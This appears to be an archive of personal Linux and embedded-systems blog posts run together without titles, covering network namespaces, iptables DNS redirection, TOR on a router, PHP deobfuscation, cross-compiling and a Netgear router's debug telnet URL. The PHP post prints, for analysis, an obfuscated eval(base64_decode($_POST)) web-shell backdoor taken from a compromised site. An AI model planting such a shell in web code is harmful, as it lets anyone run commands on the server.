ip netns exec slow su - chri

Linux namespaces are a very powerful tool. Their primary use are containers but they are useful in many other situations such as this.

Comments

• gag on 2014-01-27 07:50:45 +0100

Hi,
nice tute . but there is a problem when i create a namespace and then logout and log in again in linux kernal.there is no namespace there and namespace automatically deleted. how i can solve this problem please help.thanks

• Christian Pellegrin on 2014-01-31 10:45:45 +0100

Yes, the namespace configuration, like all other ones, must be reissued on every restart. Where it’s done depends on distribution. Under Debian Wheezy (the one I use) you have to configure /etc/network/interfaces. Another, easier but not so clean, solution is to run the commands from /etc/rc.local.

• gag on 2014-02-05 07:12:55 +0100

thanks for reply. i got it. hi everything is ok before line
ip netns exec slow aptitude safe-upgrade
but when i run above command there is unknown host error . then i try to ping google.com in new network namespace again same error. then i try ping 8.8.8.8 its working. also in local namespace ping google.com is working but not in new network namespace . please can u tell me why this and how i can resolve this.?

• gag on 2014-02-05 07:24:56 +0100

can u give me some code to write in /etc/network/interfaces or rc.local
thanks

• Christian Pellegrin on 2014-02-06 07:54:00 +0100

If you just created a newtork namespace (and not others) the /etc/resolv.conf and /etc/gai.conf file should be the same so the resolver library should work. Which distribution are you using? For /etc/rc.local it’s easy: just copy the command you use there.

• gag on 2014-02-06 09:29:18 +0100

thank you . my dns resolving problem solved after setting same nameserver in /etc/gai.conf as in /etc/resolv.conf.

what its mean “created a network namespace (not others) here what the mean of “not other.”

i am using ubuntu 13 in virtualbox . i think when we create a namespace there is /var/run/netns/ file is created using command “ip netns add ”
but on reboot the ubuntu /var/run/netns directory automatically deleted . now i want to know which command i copy in rc.local

thanks

• gag on 2014-02-06 11:32:06 +0100

hi
after these commands
ip netns exec slow bash
ip netns exec slow su – chri

we will enter in the slow network namespace .then how we can exit from this i mean how we can again enter in default namespace

• Christian Pellegrin on 2014-02-09 08:43:34 +0100

I mean that you can have also file-system namespaces for example. Perfect, in newer Linux distros gai is used in place of older resolver. To exit a namespace just exit the shell.

• gag on 2014-02-10 07:40:49 +0100

can i use mount namespace and pid namespace along with network namespace such that files in new mount namespace only accessible through network namespace . if yes how i create a mount and pid namespace and how to use in network namespace?
thanks

• Christian Pellegrin on 2014-02-10 08:14:28 +0100

Yes, you can do with the setns tool but I don’t know if it makes sense. Perhaps if you need PID and FS isolation too it’s better to go for a fully fledged solution like LXC

• Hubert on 2014-02-20 15:14:47 +0100

Many thanks for the infos..

One question though: Is it also possible to force a process to use a specific name server using namespaces, or is that more difficult?

• Christian Pellegrin on 2014-02-21 22:31:57 +0100

The resolver is configured by using /etc/resolv.conf or /etc/gai.conf so a file-system namespace can be used to present different /etc/ directories to a process.

• Christian Pellegrin on 2014-02-22 07:30:21 +0100

Another clever trick to use a different DNS is to use NAT to rewrite the destination/source address only for DNS queries. Let’s say that in the global net namespace I use Google DNS 8.8.8.8 but in my specific net namespace I want to be a good Italian citizen and let Telecom Italia DNS 85.37.17.51 decide what is good and what is evil. Now I can just do:
`
OLD_IP=8.8.8.8
NEW_IP=85.37.17.51

iptables -t nat -A OUTPUT -p tcp -d $OLD_IP -j DNAT --dport 53 --to-destination $NEW_IP
iptables -t nat -A INPUT -p tcp -s $OLD_IP --sport 53 -j SNAT --to-source $NEW_IP
iptables -t nat -A OUTPUT -p udp -d $OLD_IP -j DNAT --dport 53 --to-destination $NEW_IP
iptables -t nat -A INPUT -p udp -s $OLD_IP --sport 53 -j SNAT --to-source $NEW_IP
` Now you can check that uploaded.net resolves to 127.0.0.1 for example by using wireshark with a filter like `(tcp.port == 53 || udp.port==53) && ip.addr == 10.0.10.149` on the physical `eth0` interface, assumed that the IP for your net namespace is `10.0.10.149`. In this way you don’t have to mess with different configuration files.

• Federico Pellegrin on 2014-02-22 07:52:09 +0100

In quite old iptables version there was also the –cmd-owner flag to apply a rule to a process (per name) that could suit also the question. But this was removed at some point in 2.6 kernels. There is still –pid-owner that could fit with a little of scripting.

Otherwise there is still the possibility to filter on UID/GID (with –uid-owner and -gid-owner).

They are all related to the owner module (so use -m owner)

Ciao!

This being said I first just tried to find this informations with BigG but couldn’t find some concrete numbers on the network, just mostly more or less argumented rants on how slow soft-CPUs run. So with a little bit of troubles (ISE is huge, ISE JTAG driver support for recent kernels is not working much out of the box and the whole FPGA-PetaLinux system is a little different from what I’m used to work with) I managed to make the precompiled PetaLinux 2013.04 final work on the board and here are the results of nbench (compiled with the PetaLinux supplied microblaze crosscompiler) running on the SP605 should somebody have the same question to answer in the future:

`BYTEmark* Native Mode Benchmark ver. 2 (10/95) Index-split by Andrew D.
Balsa (11/97) Linux/Unix* port by Uwe F. Mayer (12/96,11/97)
TEST                : Iterations/sec.  : Old Index   : New Index
                     :                  : Pentium 90* : AMD K6/233*
--------------------:------------------:-------------:------------
NUMERIC SORT        :          3.6751  :       0.09  :       0.03
STRING SORT         :         0.60717  :       0.27  :       0.04
BITFIELD            :       3.908e+05  :       0.07  :       0.01
FP EMULATION        :         0.37078  :       0.18  :       0.04
FOURIER             :         0.89255  :       0.00  :       0.00
IDEA                :          9.9641  :       0.15  :       0.05
HUFFMAN             :          4.4452  :       0.12  :       0.04
LU DECOMPOSITION    :        0.033296  :       0.00  :       0.00
==========================ORIGINAL BYTEMARK RESULTS==========================
INTEGER INDEX       : 0.178
FLOATING-POINT INDEX: 0.012
Baseline (MSDOS*)   : Pentium* 90, 256 KB L2-cache, Watcom* compiler 10.0
==============================LINUX DATA BELOW===============================
CPU                 :
L2 Cache            :
OS                  : Linux 3.6.0
C compiler          : microblazeel-xilinx-linux-gnu-gcc
libc                : static
MEMORY INDEX        : 0.084
INTEGER INDEX       : 0.039
FLOATING-POINT INDEX: 0.009
Baseline (LINUX)    : AMD K6/233*, 512 KB L2-cache, gcc 2.7.2.3, libc-5.4.38
*Trademarks are property of their respective holder.
root@Xilinx-SP605-AXI-full-14_5:~#

To achieve the minimal setup to use the TOR network two components are needed:

• The TOR software itself, which is “the onion router” that routes the packets through the TOR network and presents a SOCKS interface to local applications.
• A HTTP proxy with SOCKS forwarding capabilities to make the operations easier for browsers users. The HTTP proxy used will be Privoxy

The crosscompiled packages were version 0.2.3.25 for TOR and 3.0.21 for Privoxy. Crosscompiling the packages wasn’t a very big deal (TOR has a few dependancies to be added such as OpenSSL and libz, Privoxy is even easier just take care of a little trouble with uClibc documented here). You can follow some instruction on how to do this on this older post of mine. The produced binaries can be downloaded here: tor-0.2.3.25+privoxy-3.0.21-dgn2200-bin.tar.gz (MD5SUM: df9547e5467954b921fa8d6b7da92780)

Once you transfer the binaries on your router you have to prepare at least some basic configuration. The binary package linked before contains a few sample files you can use.
TOR wise there isn’t too much to change if you’re not acting as a relay.  Just make sure that the DataDirectory points to a writable portion of the filesystem (even better if it’s a non volatile one so the startup time in the next sessions will be much improved). TOR will save here keys and such files. If you’re acting as a relay you’ll have to configure quite some more parameters and make sure you also open with iptables the appropriate ports on your router configuration (see the article here on how to open a port on the external side).
Privoxy wise there are a few more things to configure:

• directory containing the configuration files (and therefore also error templates and icons and such, also included in the binary package) with the confdir directive

• directory and file for privoxy logs (logdir and logfile)

• the IP address and port to listen to (listen-address). This should be your internal network IP address and your port of choice

• telling privoxy to forward connections using socks to TOR. This is done with the formward-socks4a directive specifying also the TOR IP (usually should be the loopback IP) and port (default 9050). The directive should look like:

  forward-socks4a / 127.0.0.1:9050 .

• should you decide to use the TOR+Privoxy with a transparent (well Privoxy defines it as “intercepted”) proxy, that is the users will be automatically proxified without having to set anything up in the browser, you should enable this in privoxy with the directive

  accept-intercepted-requests 1

• there are really a lot more options you should check and use in Privoxy to make your browsing experience even more private. Give it a good read of the documentation and once you use it access the local web interface. In the binary package I also inserted the default user.filters and user.actions file which contain a template for very useful privacy filtering (such as refeerer stripping, popup disabling and a special mention of the fun filter). Make sure to analyze them and enable useful filters/actions on your installation. This can be also done via the Web interface if the enable-edit-actions is set to 1 as in the example file.

Once you have the two configuration files and after creating all the directories needed (where TOR/Privoxy will keep their configurations files) you can launch them both from the command line (or later from your favorite rc shell). While Privoxy by default forks in background as a daemon you have to manuall do this for TOR (so send it in background with the ampersand and eventually use the nohup tool included in one of the packs in the Netgear modifications article).

Now you should be ready to use the TOR system. Just configure your browser network settings to point for HTTP/HTTPS connection to the just configured service. For example if your router IP is 10.0.1.42 and Privoxy is running on port 3636 you should proceed as in the following screenshot:
If everything went fine you should be now browsing using the TOR network. You can check the TOR checking service at https://check.torproject.org/ or use one of the various serices that notify/geolocalize the IP you’re connecting from.

As a last thing if you would like to automatically (that is transparently) proxymize all the requests going through your router with the Privoxy+TOR system just described you can easily do so by adding for example a simple rule like:

iptables -t nat -A PREROUTING -s 10.0.1.36/32 -p tcp --match multiport 
        --dport 80,443 -j DNAT --to 10.0.1.42:3636

The example above assumes the router IP is 10.0.1.42 and Privoxy configured to run on port 3636 as before. All the traffic from the single IP 10.0.1.36 for both HTTP and HTTPS will be transparently  passed via Privoxy+TOR.
You can of course activate the transparent proxying on your whole network by changing the source mask accordingly (for example 10.0.1.0/24).
Remember that Privoxy requires the accept-intercepted-requests activated if you’re using this iptables transparent proxy rule to work correctly.

If you don’t like the transparent proxy operation but don’t want to manually bother in your browser preferences and you’re using Firefox I’d suggest you the use of the FoxyProxy Firefox Plugin to be able to manage different proxies depending on your target HTTP connection or to switch them easily with a click.

Apart from changing the code in a logical way, for example by adding intermediate variables or splitting variable assignations into more operations and so on, the first most annoying part of PHP obfuscators is that they modify most of the characters in the strings values with their respective hexadecimal (format \xXX) or octal (\XXX) values and eliminate any line feeds or code structure. Once you get rid of this the code stays quite very messy but is, at least in the cases I analyzed, quite readable and just needs a little more bookkeeping with automatically named vars to go through.

Getting rid at least of this confusing representation is quite straightforward on the command line with a few tricks.

The proceeding will be shown step by step for sake of clarity, you can of course pipe multiple commands (or unite them using the -e option of sed) and get a single shot operation.

First step we will translate octal \XXX values in PHP notation to the \0XXX notation that is friendly for the echo shell command:

sed s'/\\\([0-9]\)/\\0\1/g' file.php > step1.php

Now we can use echo to interpret the octal reppresentation from the previous step and the hexadecimal values in the \xXX notation already present since the format is same in both PHP and echo:

set -f
echo -e `cat step1.php` > step2.php
set +f

Be aware that we are disabling (and at the end reenabling) the bash wildcard completion with the set command not to expand wildcards present in the file.

Now we put some newlines after the curly brackets (function definitions) so it becames a little more readable:

sed s'/[\{\}]/&\n/g' step2.php > step3.php

Now we can put a newline after “;” character (end of a statement in php) to make it again more readable. But be aware that this may break some mixed HTML/JS code in the PHP file. A better version (but probably not immediate to do it as a command liner) would check that we are out of a quote scope and skip that occourences. You may use the next version to read it better and then eventually work on the previous step file to be sure the PHP didn’t get broken.

sed s'/;/&\n/g' step3.php > final.php

Now we have a quite more readable file than the one we started with. Sure thing we still have a source file which contains just numerical variables or partial assignations but compared to the starting point it’s now a breeze (at least in the sources which I had to analyze which were about 150kb long files in origin) to go through them.

Another thing you’ll sometimes find in obfuscated PHP files, especially in some PHP exploits and such, are parts of strings encoded with base64 and then decoded on the fly with base64_decode and for example passed to an eval() to be executed. In such case from command line you can use the base64 tool with the -d command line switch for a on the fly decoding. As an example of a compromised site I noticed recently (the original code was without newlines and such but I added a few for the sake of clarity):

$_ = "CmlmKGlzc2V0KCRfUE9TVFsiY29kZSJdKSkKewogICAgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29kZSJdKSk7Cn0="
$__ = "JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7";
$___ ="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";
eval($___($__));

would result after following the procedures in this article as:

$_ = "CmlmKGlzc2V0KCRfUE9TVFsiY29kZSJdKSkKewogICAgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29kZSJdKSk7Cn0="
$__ = "JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7";
$___ ="base64_decode";
eval($___($__));

And finally the $_ expands as:

if(isset($_POST["code"]))
{
    eval(base64_decode($_POST["code"]));
}

and $__ as:

$code = base64_decode($_);
eval($code);

For the previous two results just use the command (put the string to decode in the quotes):

echo "string" | base64 -d

So the commands passed in the POST parameter code are hideously executed on the system.

Software wise the first approach was quite crude but was actually working for the first test to understand where we were going to: piping arecord output to aplay input would actually do the trick. There was a quite noticeable delay but it did the trick. Playing with both arecord and aplay parameters (mainly the sampling rate, given also the input quality was anyway pretty low) made the situation better, but still far from optimal. At least this gave quite immediately an idea that the hardware was properly connected and, after playing with various settings of amixer and on the GSM module generating the signal, of the limits in the audio output.

The second approach was still on user-land: write a single C program that will do the operation using directly the ALSA asound library, simply reading on the capturing handle and writing to the playing handle. Better response now but quite some resources used and when the CPU was busy doing other stuff some glitches can occour.

The last and most interesting part now was trying to take it all out of the operating system handling, as some studies were suggesting by some little documented ADCTODAC_LOOP in the “don’t touch it unless you know what you are doing” HW_AUDIOOUT_TEST register. After quite some trying and debugging (mostly not to leave the audio part in a state that makes it furtherly unusable with standard arecord/aplay tools) finally an adeguate procedure was found for enabling this mode (and disabling it) in an independant way, that is without any other tool to be running (of course you should set the mixer values beforehand, but that is not a tool running and emptying the audio pipes):

writel(BM_AUDIOOUT_TEST_ADCTODAC_LOOP, REGS_AUDIOOUT_BASE + HW_AUDIOOUT_TEST_SET);
writel(BM_AUDIOOUT_HPVOL_MUTE, REGS_AUDIOOUT_BASE + HW_AUDIOOUT_HPVOL_CLR);
writel(BM_AUDIOOUT_PWRDN_HEADPHONE, REGS_AUDIOOUT_BASE + HW_AUDIOOUT_PWRDN_CLR);
writel(BM_AUDIOOUT_PWRDN_ADC, REGS_AUDIOOUT_BASE + HW_AUDIOOUT_PWRDN_CLR);
writel(BM_AUDIOOUT_PWRDN_RIGHT_ADC, REGS_AUDIOOUT_BASE + HW_AUDIOOUT_PWRDN_CLR);
writel(BM_AUDIOOUT_PWRDN_DAC, REGS_AUDIOOUT_BASE + HW_AUDIOOUT_PWRDN_CLR);
writel(BM_AUDIOOUT_ANACTRL_HP_HOLD_GND, REGS_AUDIOOUT_BASE + HW_AUDIOOUT_ANACTRL_CLR);
writel(BM_AUDIOOUT_DACVOLUME_MUTE_LEFT | BM_AUDIOOUT_DACVOLUME_MUTE_RIGHT, 
          REGS_AUDIOOUT_BASE + HW_AUDIOOUT_DACVOLUME_CLR);
writel(BM_AUDIOOUT_ANACTRL_HP_CLASSAB,   REGS_AUDIOOUT_BASE + HW_AUDIOOUT_ANACTRL_SET);

And to restore to normal mode:

writel(BM_AUDIOOUT_TEST_ADCTODAC_LOOP, REGS_AUDIOOUT_BASE + HW_AUDIOOUT_TEST_CLR);
writel(BM_AUDIOIN_CTRL_FIFO_UNDERFLOW_IRQ, REGS_AUDIOIN_BASE + HW_AUDIOIN_CTRL_CLR);
writel(BM_AUDIOIN_CTRL_FIFO_OVERFLOW_IRQ, REGS_AUDIOIN_BASE + HW_AUDIOIN_CTRL_CLR);
writel(BM_AUDIOOUT_PWRDN_ADC, REGS_AUDIOOUT_BASE + HW_AUDIOOUT_PWRDN_SET);
writel(BM_AUDIOOUT_DACVOLUME_MUTE_LEFT | BM_AUDIOOUT_DACVOLUME_MUTE_RIGHT, 
          REGS_AUDIOOUT_BASE + HW_AUDIOOUT_DACVOLUME_SET);

In my case this code was actually inserted into a stand-alone small driver that would export the activation of this feature through a /dev entry (by writing 0 or 1 to the device, and returning the current state if you read it) so it could be very easily manipulated by shell with a simple echo/cat (I’m not publishing the entire driver since it contains too much code that is strictly related to the specific HW). Of course an even more elegant solution could be to integrate this feature as part of the audio driver itself.

The solution seemed to work fine and this way the system performed very well and the audio loop was immediate and not posing performance risks. Interesting enough with the proposed set of register settings the capturing device (or arecord if you wish) can still be working with no problems so some audio analysis can be done on the amplified stream (for example an analysis to prevent the Larsen effect was done in the prototype since also a MIC was later used for other purposes and of course the feedback is always waiting around the corner).
Of course be aware that you are playing with test registers and test features so your mileage may vary!

pyargocat is a small simple Python script that can be used to program the catalogs of the  Argo Navis Digital Telescope Computer from a machine with a recent Python interpreter installed using the RS232 cable that you can either buy or easily construct yourself. pyargocat can manage, that is insert to the device, all three types of catalogs in the device (asteroids, comets and user defined objects), report the number of objects present, report available space and delete previously flashed catalogs. It can be used on any machine with a Python >= 2.7 installed and it has been tested on Linux and Windows machines.

The imported catalogs have to be in the standard format Argo Navis uses (please refeer to the Argo Navis manual for the details and for links to useful resources). As an example and as a possible useful addition for your advanced observing sessions you can download this sample file I created that I often use as a basis: fede-general.txt. (the file contains all the Abell planetaries, the complete ARP catalog of Peculiar galaxies, the Hickinson galaxy groups catalog, most of the PK Planetary Nebula catalog and a selection of particullar globular clusters such as the Palomars and Terzans). Also a comet database file is given as an example with the most interesting comet objects data at the time of writing: Comets.txt

Download: pyargocat-0.1.tar.gz.

Launching the script with a -h will give you the command line usage:

usage: pyargocat.py [-h] [-b {9600,19200,38400,57600}] [-d DEV]
                    [-c {user,comet,asteroid}] [-f FILE] [-p] [-v]

Command-line Argo Navis catalog manager (version 0.1).

optional arguments:
  -h, --help            show this help message and exit
  -b {9600,19200,38400,57600}, --baud {9600,19200,38400,57600}
                        Serial Baud Rate
  -d DEV, --dev DEV     Serial Device
  -c {user,comet,asteroid}, --catalog {user,comet,asteroid}
                        Catalog to Work
  -f FILE, --file FILE  File to Import to Catalog
  -p, --purge           Purge Catalog (prior to import)
  -v, --version         show program's version number and exit

A few sample usage cases:

pyargocat.py -b 57600 -d /dev/ttyUSB0 -c user

Will connect to the device at 57600 baud using /dev/ttyUSB0 serial device and just display informations about the memory usage and number of objects in the user catalog

pyargocat.py -b 57600 -d COM7 -p -c comet -f Comets.txt

Will connect to the device at 57600 baud using COM7 serial device (this is the Windows serial device syntax), purge the data in the comet database and load the data from the mycomets.txt file into the comet database.

pyargocat.py -p -c user -f fede-general.txt

Will connect to the device at 38400 using /dev/ttyUSB0 serial device (this are the default settings when no indications are given on command line), purge the data in the userdatabase and load the data from the fede-general.txt file into the user database.

It is very important that prior launching the script you put the Argo Navis in the apporpriate catalog loading mode. To do this enter the MODE SETUP and then SETUP LOAD CAT and press ENTER. The device should display LOAD CATALOG on the first line and READY on the second. Please do also check in the MODE SETUP  then SETUP SERIAL and then SERIAL1 or SERIAL2 (depending on the serial you wish to use) the BAUDRATE at which the serial if configured (38400 by default but can be speeded up to 57600).

Be aware that the device has some well documented hardcoded limits (10 entries in the comet database and 50 entries in the asteroid catalog). Trying to insert a bigger amount will trigger and display and error.

Comments

• mm on 2013-01-22 18:13:41 +0100
  cool!!! thx for sharing !!!

• Federico Pellegrin on 2013-02-07 09:39:21 +0100
  Tim from Argo Navis Yahoo mailing list tested succesfully the Python script also under MacOs X with a USB serial connector. Thanks Tim for the feedback!

• Davor on 2015-06-15 05:52:43 +0100
  Pyargocat is the best catalog manager for me.

Get and install the right tools

The first thing to do if of course to install on the system you are working (which is called host system) the tools that run on the host and will permit you to compile something for the target system you want to compile the programs for.
This set of programming tools is usually refeered as a toolchain and contains various things: usually one or a few compilers, one or a few linkers, an assembler, various header files, little or a lot of libraries and other simillar tools. If you are lucky you may get also a debugger packed. All this tools of course are compiled to run on your host machine but produce binaries that run on the target. Depending on how the toolchain was created you may also find supplied with it some set of tools that are ready to be run on the target to help your crosscompilation adventure.
This operation may be very easy if you somehow received the crosscompiler package ready (as for example the DGN2200v3 you just download it from the Netgear site or you collegue may have passed it to you) as you just have to unpack it somewhere and then refeer to it.

The second option is that you have to find a crosscompiler for yourself. In this case before starting to query your favourite search engine you should generally try to understand from your target two main things: the architecture (this is the processor/system type, such as MIPS or ARM or m68k to name a few; and then some more details such as if talking about ARM it’s an v4 core v5 or v6 an so on) and the library set used on the target (this is often uclibc for smaller systems or glibc for more powerfull systems, then again which version of the library and in some cases also the type of library interface such as EABI or old-ABI).
To get the architecture information you can try to read some files in the /proc and /sys trees (/proc/cpuinfo is a very good start, then again many files under /sys/devices/system/cpu) or use the uname (-m) tool even better you can use, if installed, the lscpu (from the util-linux package) program from command line. Also you could try using the file tool if present on a preexisting binary to get some informations about it. In some cases you may need to do a crosscheck using the CPU name of your product with the Linux kernel sources or with the CPU datasheet at worse.
On the other side to find the used libraries, given that you don’t want to compile just statically linked binaries in which case this information may be irrelevant, you may have to examine the contents of the /lib and /usr/lib directories and try to figure out the type of library used (check for example if you see and libuClibc or which version the libc is).
Now with this two informations you should find a crosscompiler that has the same architecture target and the same (sometimes a very close version may work aswell but may be risky in some cases) library set.
A very good site where you can find many interesting free crosscompilers (you can then purchase an advanced IDE or support aswell) is for example CodeSourcery but of course it may depend on your needs.

The third situation one may come to is that there is no available toolchain ready to use and one has to be created from scratch. This operation is of course quite more advanced and I’ll not dig much into this possibility in this article. Let me just point out a great project to create toolchains that I used often that may be of great use if you are in this situation: crosstool-ng. This tool gives you the possibility to create in a quite “easy” way your personal optimized toolchain.

Now that you obtained the toolchain usually you would unpack it someplace (for example in /opt or so). Usually it would look like a “root filesystem” with a /bin directory (containing the binaries such as the compiler), the /lib for the libraries and so on. Give a look and explore it.
For ease of use you should put the binaries directory into your path so in the next step when compiling something you can easily find all the tools needed by your compilation procedure:

fede@sphynx:~$ export PATH=$PATH:/opt/toolchains/uclibc-crosstools-gcc-4.4.2-1/usr/bin/
fede@sphynx:~$ mips-linux-gcc -v
Using built-in specs.
Target: mips-linux-uclibc
Configured with: /shared/myviews/toolchain/buildroot-4.4.2-1/output/toolchain/gcc-4.4.2/configure --prefix=/usr --build=i386-pc-linux-gnu --host=i386-pc-linux-gnu 
--target=mips-linux-uclibc --enable-languages=c,c++ --with-sysroot=/opt/toolchains/uclibc-crosstools-gcc-4.4.2-1 --with-build-time-tools=/opt/toolchains/uclibc-
crosstools-gcc-4.4.2-1/usr/mips-linux-uclibc/bin --disable-__cxa_atexit --enable-target-optspace --with-gnu-ld --disable-libssp --disable-tls --enable-shared 
--with-gmp=/shared/myviews/toolchain/buildroot-4.4.2-1/output/toolchain/gmp --with-mpfr=/shared/myviews/toolchain/buildroot-4.4.2-1/output/toolchain/mpfr 
--disable-nls --enable-threads --disable-multilib --disable-decimal-float --with-float=soft --with-abi=32 --with-tune=mips32 --with-arch=mips32 --with-
pkgversion='Buildroot 2010.02-git' --with-bugurl=http://bugs.buildroot.net/
Thread model: posix
gcc version 4.4.2 (Buildroot 2010.02-git)

fede@sphynx:~$ export PATH=$PATH:/opt/toolchains/arm-crunch-linux-gnueabi/bin/
fede@sphynx:~$ arm-crunch-linux-gnueabi-gcc -v
Using built-in specs.
Target: arm-crunch-linux-gnueabi
Configured with: /opt/toolchains/crosstool-ng-1.4.2/targets/src/gcc-4.2.4/configure --build=i486-build_pc-linux-gnu --host=i486-build_pc-linux-gnu --target=arm-
crunch-linux-gnueabi --prefix=/opt/toolchains/arm-crunch-linux-gnueabi --with-sysroot=/opt/toolchains/arm-crunch-linux-gnueabi/arm-crunch-linux-gnueabi//sys-root 
--enable-languages=c --disable-multilib --with-cpu=ep9312 --with-fpu=maverick --with-float=soft --with-gmp=/opt/toolchains/arm-crunch-linux-gnueabi --with-
mpfr=/opt/toolchains/arm-crunch-linux-gnueabi --disable-sjlj-exceptions --enable-__cxa_atexit --with-local-prefix=/opt/toolchains/arm-crunch-linux-gnueabi
/arm-crunch-linux-gnueabi//sys-root --disable-nls --enable-threads=posix --enable-symvers=gnu --enable-c99 --enable-long-long --enable-target-optspace
Thread model: posix
gcc version 4.2.4

As you see we can now call the gcc compiler (with the appropriate prefix depending on the toolchain compilation) and see it’s version. The first example is the DGN2200v3 compiler shipped by Netgear while the second one is a custom build ARM9 Cirrus Logic EP9302 compiler created using the crosstool-ng package. Now we can then proceed to the next step.

Compiling

Now that you have the tools you can start compiling what you want to run on the target machine. Of course the compilation step may very different depending if you want to compile a single .c file with no libraries used, if you want to compile a program with a makefile, a program that uses an AutoConf autoconfiguration script, the Linux Kernel or something else.
Let’s start from the most basic single file hello.c program such as:

#include <stdio.h>
#include <stdlib.h>

int main(void) {
        printf("Hello world! (%s %s)\n",__DATE__,__TIME__);
}

In this case just the command line invocation should do it:

mips-linux-gcc hello.c -o hello

Will build an advanced hello world program for the DGN2200N router. Be aware that you may need to pass some more flags to the compiler in some cases. A typical example is when using an ARM compiler that supports more architectures (for example ARMv4 and ARMv5, or both thumb and not-thumb instruction set) and not forcing a specific one may result in the compilation working perfectly but the resulting binary acting in a very weird way! (in this specific case the important option to use is -march for example -march=armv4t)
To see if the file was really crosscompiled correctly you can use again the file tool on the generated file, for example:

fede@sphynx:~/dgn2200$ file hello
hello: ELF 32-bit MSB executable, MIPS, MIPS32 version 1 (SYSV), dynamically linked (uses shared libs),
 with unknown capability 0x41000000 = 0xf676e75, with unknown capability 0x10000 = 0x70403, not stripped

or another example:

fede@sphynx:~/arm/new_fs/usr/bin$ file inadyn 
inadyn: ELF 32-bit LSB executable, ARM, version 1 (SYSV), dynamically linked (uses shared libs),
 for GNU/Linux 2.6.14, not stripped

The second case you may walk upon is a project with a Makefile that builds the project using various files in the source tree. In this case you should replace all the references to the compiler, linker and other tools with the references to your crosscompiler. If the Makefile was done in a clear way this should be defined at it’s beginning with variabiles such as CC, LD, CFLAGS, LDFLAGS and so on. In some cases you may even just have a CROSS-COMPILE variable that gets prepended automatically to all the tools. Of course everything depends on the specific Makefile (and mostly on its author!) so you have to examine it.

Another common scenario you may find yourself in front of is a package that uses the AutoConf scripting system to automatically detect what is installed on your system and create accordingly correct Makefiles to proceed with the compilation. When compiling for your local system you would most probably just do a:

./configure
make

and the trick would be done: the first command would search your system for required files (headers, libraries and so on) and the second would compile the package. Of course the first step may result in missing dependencies and so on.
When crosscompiling the main difference is that you should tell to configure that you are doing so using the built in options (./configure –help):

System types:
  --build=BUILD     configure for building on BUILD [guessed]
  --host=HOST       cross-compile to build programs to run on HOST [BUILD]
  --target=TARGET   configure for building compilers for TARGET [HOST]

So adding –target=, for example –target=mips-linux should do the trick, the configure will understand it’s a crosscompilation and create the makefiles accordigly. If you need to pass some flags to the compiler or linker setting the CFLAGS and LDFLAGS on the command line to configure is suggested.
So briefly for example:

CFLAGS="-cflags -morecflags" LDFLAGS="-linkerflags" ./configure --host=arch-linux
make

Could be a generic recipe.
Of course this may not be all: if the package (and it’s configure) requires some extra libraries you may need to first crosscompile and place them someplace (inside the toolchain tree may be a good option to have them shared in the future) using a simillar approach (and eventually adding the paths to where you installed the libraries to configure). Of course on the other side as when compiling for local usage you may decide to disable some option that is giving you compilation headaches and you don’t really need it.
Another thing may happen that could give you headaches: sometimes the configure script is created in a way (ignoring maybe a bit the cross-compilation needs) that it will need some binaries from the package to be executed (for example to create a temporary table with data or so). In this case of course you’ll need to cheat the build system creating it first with your local host compiler and then doing the crosscompilation step. One very useful option of configure is the –cache option which gives you the possibility to pass a text file that contains certain answers that you prepare by hand to avoid configure troubles. The format of the text file is quite simple, here is an example to predefine some glib variables since they are usually generated by a glib support tool:

glib_cv_long_long_format=ll
glib_cv_stack_grows=no
ac_cv_func_posix_getpwuid_r=yes
glib_cv_uscore=yes
ac_cv_have_abstract_sockets=yes

Remember also that the compilation tests (often found as make test rule) cannot be run when crosscompiling for obious reasons.

Last (but not least) a few words about the Linux Kernel crosscompilation. In this case in general you have to set the ARCH variable to the architecture name (ie. ARM, MIPS) and the CROSS_COMPILE variable to the prefix of your toolchain tools (ie. mips-linux- or arm-linux-gnueabi- ; notice the final dash that is not required when we invoke configure!) and then you can proceed as usual with your favourite configuration step (make configure, menuconfig, xconfig and so on) and then build step.

export ARCH=arm
export CROSS_COMPILE=arm-linux-gnueabi-
make menuconfig
...
make

Be aware that on embedded systems since a particullar boot loader is used the build step may be different from what you’re used on your PC (make zImage or bzImage or so) since the final format has to be understood by the boot loader. For example when preparing an image for the popular U-Boot boot loader you should invoke make uImage to create an appropriate image (this will require also the mkimage tool to be installed on your system).

Other hints:

Be aware that libtool while generating libtool libraries files (.la extension) inserts the full path. So be carefull that you’re not mixing host/target paths accidently if you crosscompilation is requiring libraries creation.
Many packages nowadays use pkg-config tool to query the system where some libraries are installed and which command line options are required to link and use them. Setting the environment variable PKG_CONFIG_PATH to the directory containing the .pc files for your target (that could often be found inside the toolchain directory tree) is therefore a very good idea not to have to tinker manually huge library flags every time.

Last but not least: if you have a complicated project to crosscompile and you’re lucky enough to have some mainstream developement board available for that architecture (for example if you’re working with ARM something like the OpenRD or Raspberry PI are good choices, or an emulated ARM machine using QEmu is also a good but longer shot) don’t insist banging your head on the crosscompiler, it’s fine if you do everything on the target platform, nothing to be ashamed of 😉

Comments

• on 2013-05-04 08:02:41 +0100

Awesome post.

Note: this is a heavily “Work in Progress”  page so please check it out here and there if you are interested in the topic! (last update 09th June 2014)

First of all you can find the source tree for the router at Netgear site starting from their GPL Open Source Code for Programmers page. The package also contains a suitable toolchain uclibc-crosstools-gcc-4.4.2-1. Everything described in this page refeers to the “official” firmware V1.1.00.10_1.00.10 . It may also apply to future updates and to the beta version that Netgear started to distribute but it may require slight modifications.

The next step to access to your router internals is to enable the telnet shell using the debug backdoor present in the firmware. It is easily done by accessing (we suppose 10.0.1.69 is your router IP address) the URL: http://10.0.1.69/setup.cgi?todo=debug This will enable telnet connections from your local network. Just login with your administrator credentials.

Once you entered you can analyze the running system, briefly:

# cat /proc/version
Linux version 2.6.30 (root@BuildServer) (gcc version 4.4.2 (Buildroot
 2010.02-git) ) #1 Fri Nov 4 13:30:23 CST 2011

# cat /proc/cpuinfo
system type             : 963281TAN
processor               : 0
cpu model               : Broadcom4350 V7.5
BogoMIPS                : 319.48
wait instruction        : yes
microsecond timers      : yes
tlb_entries             : 32
extra interrupt vector  : no
hardware watchpoint     : no
ASEs implemented        :
shadow register sets    : 1
core                    : 0
VCED exceptions         : not available
VCEI exceptions         : not available

unaligned exceptions            : 10

# free
total used free shared buffers
